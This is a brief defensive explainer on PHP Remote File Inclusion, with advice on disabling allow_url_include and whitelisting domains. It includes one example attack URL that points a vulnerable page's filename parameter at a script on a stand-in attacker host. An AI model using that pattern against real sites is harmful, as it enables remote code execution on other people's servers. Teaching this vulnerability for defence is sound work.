Several web pages use include functions to combine the contents of other files into a single page. Unfortunately, if these inclusions are not securely implemented they can be used to include files which have not been approved by the administrator, these files can sometimes be located on remote servers, which leads us to the vulnerability name Remote File Inclusion. With the improved awareness of vulnerabilities like this, the folks behind PHP have taken precautions to help prevent remote file inclusion from occurring however if misconfigurations have occurred the vulnerability can still exist.
You should be able to see a sample URL below, this URL is fairly standard with the exception that the filename parameter is a remote URL, this implies that when the URL is loaded, the remote file may be included as part of the requested page.
https://vulnerable-bookstore.com/book.php?filename=https://attacker.com/malicious.phpSo what’s so bad about including remote files? After all, plenty of websites make use of iframes. Well, remote files aren’t simply loaded and placed on top of the page, the file is retrieved from the remote server, included and executed. This is why remote file inclusion is so dangerous, the files themselves are treated as though they are a part of the local website and so become a form of remote code execution.
Preventing remote file inclusion
This kind of vulnerability can only occur if the server has allow_url_include enabled within the php.ini file, to disable this feature you simply have to search for the file and set the line allow_url_include equal to Off. It should appear like the example below.
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-include
allow_url_include=OffIf you’re insistent on the need for including executable remote files then the best most secure course of action would be to create a whitelist of safe domains/filenames, should someone alter the domain to an unauthorised option then the code would perform some alternate option rather than including and running the file.
